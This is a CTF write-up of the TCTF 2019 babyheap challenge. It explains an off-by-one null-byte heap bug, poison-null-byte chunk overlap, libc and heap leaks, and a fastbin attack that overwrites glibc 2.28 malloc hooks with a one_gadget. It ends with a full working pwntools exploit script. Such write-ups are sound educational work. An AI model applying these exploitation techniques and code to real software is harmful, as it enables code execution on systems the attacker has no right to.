在二进制的蛮荒世界里
有最迷惑的漏洞和最险恶的防护
IDA 和 gdb 是忠实的伙伴
逻辑和决心是我们的武器
热爱是引路人
Hi, This is my first time to give a write-up in English. I attended TCTF 2019 last weekend and lucky enough to solve this lovely babyheap challenge 30mins before the game finished. Really enjoy this challenge and want to share it with more pwn players.
The challenge package contains 3 files: a 64bit ELF called babyheap, and two libraries ld-2.28.so
and libc-2.28.so
, seems that it is deployed under Ubuntu 18.10. If you’re using 16.04 or other versions of ubuntu, you certainly could run this binary with LD_PRELOAD
, but my suggestion is setting up an 18.10 environment for debugging, because with libc6-dbg
installed, you can get libc symbol and view the heap state easily. Meanwhile, the function offset from libc would be exactly the same as the target machine. Docker is a good option.1
2
3
4
5Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
No surprise, all mitigations are presented, and as per its definition, this is a common note system challenge with the following menu:1
2
3
4
5
6
7===== Baby Heap in 2019 =====
1. Allocate
2. Update
3. Delete
4. View
5. Exit
Command:
Vulnerability: off-by-one null byte
It looks very familiar to me and I remember there was a similar babyheap challenge last year. I dropped them both in ida and look at the difference, then I identify the bug very soon. babyheap 2018 on the left, babyheap 2019 on the right. The change appears in update function, when it read the new content for an allocated chunk, it calls a function to get input.bug1
I followed into the function and, clearly, there is an off-by-one null byte bug in our 2019 challenge.bug2
Beside that, another change occurs in the init function, which stealthily malloc a large chunk.difference
Other parts of the program are identical. BTW, babyheap 2018 was given an arbitrary off-by-one bug, we can overwrite one extra byte to the size of next chunk. A great writeup (in Chinese) can be found here: 0CTF 2018 Babyheap
Constrains and thoughts
OK, let’s wrap up the bug and constraints of this challenge:
- Bug: off-by-one null byte
- Constrains:
- list address randomization
- 0 < size < 88 (0x58)
- at max 16 items in the array
- libc 2.28 with tcache feature
In the init function, we can see the pointers of allocated items are not store at bss section as usual, but in a random memory space change each runtime. This prevents us to perform unlink attack technique or use the pointer list to perform arbitrary write. Also, it brings us some inconvenience when debugging, so I patch the file string /dev/urandom
to ./addr\x00
, and create an addr
file with 16 bytes in the same directory. With this trick, the address of item array fixed on each run.
There are two known techniques about off-by-one null byte, we can find them on how2heap, the first one is house-of-einherjar
, which results in getting a controlled pointer; the second is poison null byte
, which leads to overlapping chunks. But both of techniques require the ability to malloc a small bin chunk, for example, we need to have a chunk size like 0x1xx
, so that we could overwrite it to 0x100
and perform following steps. So mission one for us: figure out how to create a small bin chunk.
Small bin chunk
Remeber the suspicious malloc(0x1f000)
in init function? After this operation, the top chunk becomes 0x1da0
.1
2
3
4
5
6
7
8
9
10
11
12
13
14
15pwndbg> heapinfoall
=================== Thread 1 ===================
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578260 (size : 0x1da0)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
Then I investigated the source code of malloc.c, it seems that when top chunk size is not enough for the malloc request, it will call malloc_consolidate()
function and merge the freed chunk in fastbins! So, the idea is making a sequence of chunks on the fastbins, then consume the top chunk until small enough. Then any larger request will trigger malloc_consolidate()
and make a small bin size chunk.
At first I worried about the tcache feature will prevent us from consuming the top chunk too far, however, it turns out tcache does not apply to calloc
, once a chunk get into tcache bin, you cannot allocate it again with calloc
. Also, we can shrink the top chunk size each time after allocation, this trick can help us to consume the top chunk quickly. Here is the heap state before triggering malloc_consolidate()
:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x555555578c80 --> 0x555555578c20 --> 0x555555578bc0 --> 0x555555578b60 --> 0x555555578b00 --> 0x555555578aa0 --> 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
Then we calloc(0x28)
, it triggers malloc_consolidate()
and merage fastbin chunk into unsotredbin, creating a chunk in size of 0x210
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x555555578ad0 (size : 0x210)
unsortbin: 0x555555578ad0 (size : 0x210)
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
Posion Null Byte
Comparing two techniques about off-by-one null byte, house of einherjar
seems not to suit for this case, so let’s play with poison null byte
. Here’s an amazing blog about it: Posion null byte | Ret2Forever (also in Chinese), which makes me feel I have to borrow a picture from it.posionnullbyte
As the author concluded in this blog post, we need to allocate 3 chunks in this technique, name them a, b, c. Chunk a can be arbitrary size, but chunk b and c must not be fastbin size. Now we can make an unsorted bin to serve as chunk b, but what about chunk c? Does it have to be non-fastbin? No, the purpose of chunk c is to merge with chunk b and create a large chunk which overlap with some small chunks inside. So actually we can use the same trick in the last section to trigger malloc_consolidate
and merge chunk b and c. Okey dokey, if we lay out the heap as it suggested, we can get the heap state like:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x555555578b10 (size : 0x230)
unsortbin: 0x555555578b10 (size : 0x230)
(0x020) smallbin[ 0]: 0x555555578cb0 (overlap chunk with 0x555555578b10(freed) )
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
and the item array is like:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
170xc0e5acba260: 0x1 0x58
0xc0e5acba270: 0x555555578a50 0x1
0xc0e5acba280: 0x48 0x555555578d50
0xc0e5acba290: 0x1 0x48
0xc0e5acba2a0: 0x555555578da0 0x1
0xc0e5acba2b0: 0x28 0x555555578df0
0xc0e5acba2c0: 0x1 0x28
0xc0e5acba2d0: 0x555555578ab0 0x1
0xc0e5acba2e0: 0x30 0x555555578ae0
0xc0e5acba2f0: 0x1 0x58
0xc0e5acba300: {{0x555555578b40}} 0x0
0xc0e5acba310: 0x0 0x0
0xc0e5acba320: 0x1 0x58
0xc0e5acba330: 0x555555578ba0 0x1
0xc0e5acba340: 0x58 0x555555578c00
0xc0e5acba350: 0x1 0x58
0xc0e5acba360: 0x555555578c60 0x0
Now the large chunk in unsortedbin(0x555555578b10
) is already overlap with item #6(0x555555578b40
). Following job is straight-forward, just like baby heap 2018. We perform fastbin attack to get an item from the address in main_arena
, then we change top chunk
to somewhere before __malloc_hook
, then we could overwrite __malloc_hook
with one gadget. Btw, you have to turn on ASLR to complete fastbin attack on main_arena, and it only success when heap address starts with 0x56
, otherwise the size check fails.
But unfortunately, all one gadget in libc-2.28 does not meet the requirement at the call:1
2
3
4
5
6
7
8
9
10
110x50186 execve("/bin/sh", rsp+0x40, environ)
constraints:
rcx == NULL
0x501e3 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x103f50 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
@Tac1t0rnX also conclude some workaround for this situation here:
Pwnable.tw secretgarden
, I first try to write __malloc_hook
to _libc_realloc+???
and __realloc_hook
to one_gadget
, but it also failed. So I have to turn to __free_hook
trick, which overwrites top chunk to __free_hook - 0xb58
, and allocate a bunch of junk chunk to reach __free_hook
. To consume the top chunk and reach __free_hook
buffer, we need to zero out the fastbin after each free. Here is my very first dirty exp used in the game.
Exp #1
1 | from pwn import * |
Better solution?
Actually, it wasted me a lot of time when debugging with the __free_hook
trigger, so after the game, I wonder if there is any better way to call the one gadget? From the write up by r3kapig: here, I found they write __malloc_hook
to svc_run+0x38
and __realloc_hook
to one_gadget
. svc_run+0x38
happen to be call realloc
, with this additional call, it makes [rsp+0x40]==0
at the one gadget point.
svc_run
but it is still a coincidence, can we have something more general for similar situation? So I looked at every call realloc
in libc-2.28.so, and finally found a perfect jump gadget. The gadget is at 0x105ae0
, which can help to set [rsp+0x38]
to 0, and then call realloc
, when the program hit our one gadget point, [rsp+0x40]
is exactly where we set 0 before!
So next time when you meet the situation in libc-2.28, feel confident to set __malloc_hook
to libc+0x105ae0
and __realloc_hook
to second one gadget
.
gadget
Here is my refined exp:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188from pwn import *
import re
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': './libc-2.28.so'}
libc = ELF('./libc-2.28.so')
if len(sys.argv) == 1:
p = process('./babyheap1')
elif len(sys.argv) == 3:
p = remote(sys.argv[1], sys.argv[2])
def rc(x):
return p.recv(x)
def ru(x):
return p.recvuntil(x)
def se(x):
return p.send(x)
def sl(x):
return p.sendline(x)
def sea(a, b):
return p.sendafter(a, b)
def sla(a, b):
return p.sendlineafter(a, b)
def info_addr(tag, addr):
return p.info(tag + ': {:#x}'.format(addr))
patten = re.compile("Chunk (.*) Allocated")
def alloc(size):
ru('Command: ')
sl('1')
ru('Size: ')
sl(str(size))
res = ru('\n')
return int(patten.search(res).group(1))
def update(idx, size, content):
ru('Command: ')
sl('2')
ru('Index: ')
sl(str(idx))
ru('Size: ')
sl(str(size))
ru('Content: ')
se(content)
def delete(idx):
ru('Command: ')
sl('3')
ru('Index: ')
sl(str(idx))
def view(idx):
ru('Command: ')
sl('4')
ru('Index: ')
sl(str(idx))
def prepare_fastbin():
a = alloc(0x58) #0 stay 0x60
b1 = alloc(0x58) #1 fastbin 0xc0
b2 = alloc(0x58) #2 fastbin 0x120
b3 = alloc(0x58) #3 fastbin 0x180
b4 = alloc(0x58) #4 fastbin 0x1e0
b5 = alloc(0x58) #5 fastbin 0x240
b6 = alloc(0x58) #6 fastbin 0x2a0
c = alloc(0x58) #7 fastbin 0x300
# prepare fake chunk c.prev_size = 0x200
update(7, 0x48, '\x00'*0x40+p64(0x200))
# put them in fastbin to wait for consolidate
for i in range(1, 7):
delete(i)
def strain_and_prepare():
# fill tcache to comsume top chunk size
for size in [0x58, 0x48, 0x38]:
for i in range(7):
_id = alloc(size)
update(_id, size, 'a'*size)
delete(_id)
size = 0x28
for i in range(2): # fill tcache
_id = alloc(size)
delete(_id)
for i in range(5):
_id = alloc(size)
update(_id, size, 'a'*size)
delete(_id)
# now top_chunk->size = 0x100
prepare_fastbin()
alloc(0x48) #0
alloc(0x48) #1
alloc(0x28)
strain_and_prepare()
# now top_chunk->size = 0x30
# we can alloc any size >= 0x30 to trigger consolidate
off_by_one_chunk = alloc(0x28)
# now off_by_one_chunk(0x28) is at 0x87a0, a small bin (0x210) at 0x87c0
# we can off-by-one to set small bin chunk to 0x200.
update(off_by_one_chunk, 0x28, 'a'*0x28)
a = alloc(0x58) # fastbin
b1 = alloc(0x58) # in_used
b2 = alloc(0x58) # in_used
b3 = alloc(0x58) # in_used
b4 = alloc(0x58) # fastbin
c = 7
# push in fastbin
update(a, 0x51, 'a'*0x50 + p8(0x60)) # put a fake chunk size to bypass check
delete(c)
delete(a)
# trigger consolidate
alloc(0x30)
# [OVERLAP] now [b1, b2, b3, b4] in used but also in unsortbin
victim = alloc(0x58)
# b1[0x58]: 0x555555578830,
# victim[0x58]: 0x555555578810 overlap
# leak libc
view(b1)
ru(': ')
leak = ru('\n')
leak_libc = u64(leak[0x40: 0x48])
info_addr('leak_libc', leak_libc)
libc.address = leak_libc - 0x1e4ca0
info_addr('libc', libc.address)
# leak heap
victim2 = alloc(0x48)
delete(1) # [0x48]
delete(victim2)
view(b1)
ru(': ')
leak = ru('\n')
leak_heap = u64(leak[0x40: 0x48])
info_addr('leak_heap', leak_heap)
heap = leak_heap - 0x1fce0
info_addr('heap', heap)
# fastbin attack, get top_chunk at main_arena.
delete(4) # [0x28]
arena_target = libc.address + 0x1e4c55
# edit victim2->fd
update(b1, 0x48, '\x00'*0x38 + p64(0x51) + p64(arena_target))
junk = alloc(0x48)
arena_buf = alloc(0x48)
main_arena = libc.address + 0x1e4c40
info_addr("arena", main_arena)
malloc_hook = libc.symbols['__malloc_hook']
info_addr("malloc hook", malloc_hook)
new_top = malloc_hook - 0x28
info_addr("new top", new_top)
update(arena_buf, 0x43, '\x00'*0x3b + p64(new_top))
# consume remain unsortedbin
for i in range(4):
junk = alloc(0x58)
delete(junk)
update(arena_buf, 0x30, '\x00'*0x30)
victim = alloc(0x58)
one_gadget = libc.address + 0x501e3
jump_gadget = libc.address + 0x105ae0
update(victim, 0x20, '\x00'*0x10 + p64(one_gadget) + p64(jump_gadget))
# allocate chunk to trigger one gadget
sl("1")
sl("1")
p.interactive()
Final words
With this challenage solved, our team ranked at 10th place in risingstar scoreboard. Thanks for @eee and @Oops for all great challenges, really enjoy the game! Wish our team can meet top players in Shanghai!